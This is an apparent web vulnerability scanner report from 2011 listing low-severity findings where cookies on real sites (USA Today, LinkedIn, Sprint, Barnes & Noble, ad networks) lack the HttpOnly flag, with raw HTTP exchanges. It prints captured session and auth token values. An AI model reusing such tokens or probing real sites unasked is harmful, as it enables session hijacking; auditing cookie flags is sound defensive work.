http://www.cars.com/includes/js/used-car-widget_driver.js
http://www.cars.com/test/widget/Custom/carslogo71x34.jpg
http://www.myspace.com/Modules/PostTo/Pages/
http://www.nbcudigitaladops.com/favicon.ico
http://www.newslibrary.com/nlsearch.asp
http://www.sacbee.com/reg_js/access_check.js
http://www.wtp101.com/pull_sync
http://www.youtube.com/results

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

14.1. http://content.usatoday.com/quickquestion/jquery/1.0.1.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://content.usatoday.com
Path:	/quickquestion/jquery/1.0.1.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSSQQCBBA=DNBPNDFBIOJCBKPGCEBKCEBJ; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quickquestion/jquery/1.0.1.html HTTP/1.1
Host: content.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11774
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDSSQQCBBA=DNBPNDFBIOJCBKPGCEBKCEBJ; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:22:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script t
...[SNIP]...

14.2. http://findnsave.sacbee.com/api/aacoupons.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://findnsave.sacbee.com
Path:	/api/aacoupons.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
LocationCookie=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; expires=Tue, 04-Oct-2011 01:22:32 GMT; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/aacoupons.json HTTP/1.1
Host: findnsave.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-AspNet-Version: 2.0.50727
Set-Cookie: LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
Set-Cookie: LocationCookie=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; expires=Tue, 04-Oct-2011 01:22:32 GMT; path=/
Set-Cookie: LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
X-Powered-By: ASP.NET
X-Server-Name: FS1
Date: Sun, 04 Sep 2011 01:22:31 GMT
Connection: close
Content-Length: 6785

{ "result": { "coupon": [ {"address": "1714 16th Street", "advertiserId": "22883", "advertiserLogoUrl": "http://logos.advertisers.analoganalytics.com/production/22883/standard.png?1303423785", "adve
...[SNIP]...

14.3. http://findnsave.sacbee.com/api/groupon.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://findnsave.sacbee.com
Path:	/api/groupon.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
LocationCookie=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; expires=Tue, 04-Oct-2011 01:22:29 GMT; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /api/groupon.json HTTP/1.1
Host: findnsave.sacbee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/7.5
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-Rewritten-By: ManagedFusion (rewriter; reverse-proxy; +http://managedfusion.com/)
X-ManagedFusion-Rewriter-Version: 3.0
X-AspNet-Version: 2.0.50727
Set-Cookie: LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
Set-Cookie: LocationCookie=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; expires=Tue, 04-Oct-2011 01:22:29 GMT; path=/
Set-Cookie: LocationCookieSession=City=Sacramento&State=CA&CommonCity=Sacramento&CommonState=CA&PostalCode=95928&Lat=38.5556&Lon=-121.4689&LocString=Sacramento%2c+CA%2c+95928; path=/
X-Powered-By: ASP.NET
X-Server-Name: FS1
Date: Sun, 04 Sep 2011 01:22:28 GMT
Connection: close
Content-Length: 927

{ "result": {"deal": {"announcementTitle": "Up to 63% Off International Fare at Casino Royale", "bestPrice": "$12", "dealUrl": "http://findnsave.sacbee.com/Deal/25964/Casino-Royale", "id": "25964",
...[SNIP]...

14.4. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://search.barnesandnoble.com
Path:	/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

pds%5Fsess=d=AQDHu9rRnD%2fjrm8xcUgxEoj1Ylkl91VD8B%2bNGqKkf2oKsODN%2bAeOfCX4zlRMNjdk3QTJPGq5srW21wstdDzZfL2wxAnpys7HVCWpD97KNbjNRaKzSOJKXov3Z%2fvO1s3OLEc%3d&v=5; domain=.barnesandnoble.com; path=/
pds%5Fvcart%5Fsess=d=dof%2fQCAAIDJzmP6bP5jsrwnis1h3Kt8OO9Ec3ZRg76Y4McQBYQAEAAIAaQAAAAQA&v=5; domain=.barnesandnoble.com; path=/
pds%5Fprof%5Flife=d=%2f0%2fSNRQANJZKOAJECq4fuATs16FghsQBYQAIAAoAewAAAHwAAgAAAAAAAAAAAAAA&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/
pds%5Flife=d=AQAw9qTVv8oLrLVmei2ledNrPyUXm7x5jgqi12MjRitKAKjnGigKHspVh2gOF1gyvghtGR%2ffErW1kHRLKuMKmS6B&v=5; domain=.barnesandnoble.com; expires=Fri, 02-Sep-2016 01:23:43 GMT; path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.5. http://shop.sprint.com/mysprint/shop/phone_wall.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://shop.sprint.com
Path:	/mysprint/shop/phone_wall.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A04BDCEBB4F1F4B037F7C60B1DAAC0CB.shop41; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysprint/shop/phone_wall.jsp HTTP/1.1
Host: shop.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 04 Sep 2011 01:23:54 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Set-Cookie: JSESSIONID=A04BDCEBB4F1F4B037F7C60B1DAAC0CB.shop41; Path=/
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLFByb2plY3RJbnN0YWxsLzkuMCBbIERQU0xpY2Vuc2UvMCBCMkJMaWNlbnNlLzAgIF0=
cache-control: no-store, no-cache, must-revalidate, max-age=0
Location: http://shop.sprint.com/mysprint/zipcode_intercept.jsp;jsessionid=A04BDCEBB4F1F4B037F7C60B1DAAC0CB.shop41?redirectURL=http%3A%2F%2Fshop.sprint.com%2Fmysprint%2Fshop%2Fphone_wall.jsp&_requestid=45835
Content-Length: 0
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP=" NOI DSP COR NID PSA OUR IND COM NAV STA "
Connection: close
Content-Type: text/plain; charset=UTF-8

14.6. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C58B4400F3879E26517C8A2E3ECF06E2; Path=/
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:50:07 GMT
Content-Length: 90
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2"}});

14.7. http://trc.taboolasyndication.com/reuters/trc/2/json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://trc.taboolasyndication.com
Path:	/reuters/trc/2/json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097447;Path=/reuters/
JSESSIONID=.prod2-f2;Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /reuters/trc/2/json?tim=19%3A44%3A27.751&publisher=reuters&pv=2&list-size=3&list-id=rbox-t2v&id=353&uim=article&intent=s&uip=article&external=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX&llvl=2&item-id=USTRE78222D20110903&item-type=text&item-url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&page-id=6c870e4113048a2a02755a640f72c25ab23ac976&cv=4-8-2-1-48560-3339640&uiv=default&cb=TRC.callbacks.recommendations_1 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:50:47 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: taboola_session_id=v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-9744-efca878a3ea7_1315097030_1315097447;Path=/reuters/
Set-Cookie: JSESSIONID=.prod2-f2;Path=/
Set-Cookie: taboola_wv=;Path=/reuters/;Expires=Mon, 03-Sep-12 00:50:47 GMT
Content-Length: 3826

TRC.callbacks.recommendations_1({"trc":{"req":"48e76b6e191407b87e2eaaa3fddbfe40","session-id":"cf5b371b2ea2c82fafb75969374381dc","session-data":"v1_cf5b371b2ea2c82fafb75969374381dc_ae7f02b7-d8fc-4e74-
...[SNIP]...

14.8. http://www.cars.com/go/crp/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cars.com
Path:	/go/crp/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0000Wi7Ob1JlqbXe34f3Rg8tOMg:15mijjg76; Path=/
Registration=currentUserId:os2h00mIJBCqaXrpC3yMnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQuctqROfU3Gx6shhrLor0ffNW2iOUVe7nWvIF4VeWiUYU=; Expires=Fri, 02 Sep 2016 01:25:27 GMT; Path=/; Domain=www.cars.com
affiliate=national; Expires=Sun, 25 Sep 2011 01:25:27 GMT; Path=/; Domain=www.cars.com
cars_persist=3963688108.20480.0000; expires=Sun, 04-Sep-2011 01:55:27 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/crp/index.jsp HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.9. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

leo_auth_token="GST:8lJ4lDkdP0OE0h6j6mXCCjzzzkaomys3-lXw4IkIpLaKrVERcPeQ09:1315099580:26e1b09e2a8704070bf09a8c9ebfe0696266e3a0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:56:19 GMT; Path=/
s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.10. http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.traffic.com
Path:	/Charlotte-Traffic/Charlotte-Traffic-Map.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=2324C6551511416646806539E2235D03.trafficfe; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Charlotte-Traffic/Charlotte-Traffic-Map.html HTTP/1.1
Host: www.traffic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:28:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_jk/1.2.25
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
Set-Cookie: JSESSIONID=2324C6551511416646806539E2235D03.trafficfe; Path=/
Content-Language: en
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 40345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-e
...[SNIP]...

14.11. http://www.usatoday.com/community/profile.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.usatoday.com
Path:	/community/profile.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSQSTDCBD=PLPNKDFBOKBABODIEEPNMHMM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/profile.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.12. http://www.usatoday.com/marketing/feedback.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.usatoday.com
Path:	/marketing/feedback.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQCACSACD=JEHEEDFBBDOBLPCOJAALENNI; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /marketing/feedback.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35984
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQCACSACD=JEHEEDFBBDOBLPCOJAALENNI; path=/
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 01:28:32 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<sc
...[SNIP]...

14.13. http://www.usatoday.com/marketing/questions.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.usatoday.com
Path:	/marketing/questions.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAQQCSTTD=HFENPINAOJGOOPKGOLAKELOM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /marketing/questions.htm HTTP/1.1
Host: www.usatoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.14. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ANON_ID=aTnsXDNj6WqoyhURALhZcBrHwBvZaUWbjSqX2DmFYQP3yOAgnNKGLlr9eglkIxJOkrcm2VawOaWiZbjMoBQ; path=/; domain=.tribalfusion.com; expires=Sat, 03-Dec-2011 01:01:39 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.15. http://ad.360yield.com/match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.360yield.com
Path:	/match

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tuuid=54acfc8c-ecc8-4682-8bdb-ca423a9d65bf; path=/; expires=Tue, 03 Sep 2013 01:21:07 GMT; domain=ad.360yield.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /match HTTP/1.1
Host: ad.360yield.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=54acfc8c-ecc8-4682-8bdb-ca423a9d65bf; path=/; expires=Tue, 03 Sep 2013 01:21:07 GMT; domain=ad.360yield.com
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Sun, 04 Sep 2011 01:21:07 GMT
Connection: close

14.16. http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/N763.no_url_specifiedOX2619/B5770010.3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=229b025847010047|1181183/541316/15221|t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1; path=/; domain=.doubleclick.net; expires=Fri, 30 Aug 2013 01:33:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N763.no_url_specifiedOX2619/B5770010.3 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.17. http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/N763.usatoday.comOX3622/B5770010.5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=229b025847010047|1181183/552924/15221|t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1; path=/; domain=.doubleclick.net; expires=Fri, 30 Aug 2013 01:33:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/N763.usatoday.comOX3622/B5770010.5 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://espn.go.com/college-football/team/_/id/99/lsu-tigers?ex_cid=2011_bnnr_CFB_xxxx_awrs
Set-Cookie: id=229b025847010047|1181183/552924/15221|t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1; path=/; domain=.doubleclick.net; expires=Fri, 30 Aug 2013 01:33:36 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 04 Sep 2011 01:21:29 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

14.18. http://ad.turn.com/r/cs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/r/cs

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=8932325985038971405; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:14:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.19. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2925993182975414771; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:49 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:05:49 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
src="http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&rnd=4338981458170383181&fpid=6&nu=n&t=
...[SNIP]...

14.20. http://ad.yabuka.com/statsin/adframe/803/300x250 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yabuka.com
Path:	/statsin/adframe/803/300x250

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

client_id=laFpD31Wk2; Path=/
tc="cDF77OkBNtpIeBFOSP/PqGtaKOk=?_expires=STEzMTU1MTEwODAKLg==&client_id=UydsYUZwRDMxV2syJwpwMQou"; Domain=.yabuka.com; expires=Thu, 08-Sep-2011 19:44:40 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.21. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bh="b!!!!U!!-O3!!!!$=3G@^!!Os7!!!!$=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!$=3G@^!#bw^!!!!$=3G@^!#eP^!!!!#=3*$x!#fBj!!!!$=3G@^!#fBk!!!!$=3G@^!#fBl!!!!$=3G@^!#fBm!!!!$=3G@^!#fBn!!!!$=3G@^!#fG+!!!!$=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!$=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3IO!!!!$=3G@^!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!$=3G@^"; path=/; expires=Tue, 03-Sep-2013 00:42:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?id=1006093&id=1086373&id=1264419&id=1086372&id=1086371&id=1086370&id=1086369&id=1347038&id=1086733&id=1404407&id=317325&id=75921&id=1061877&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
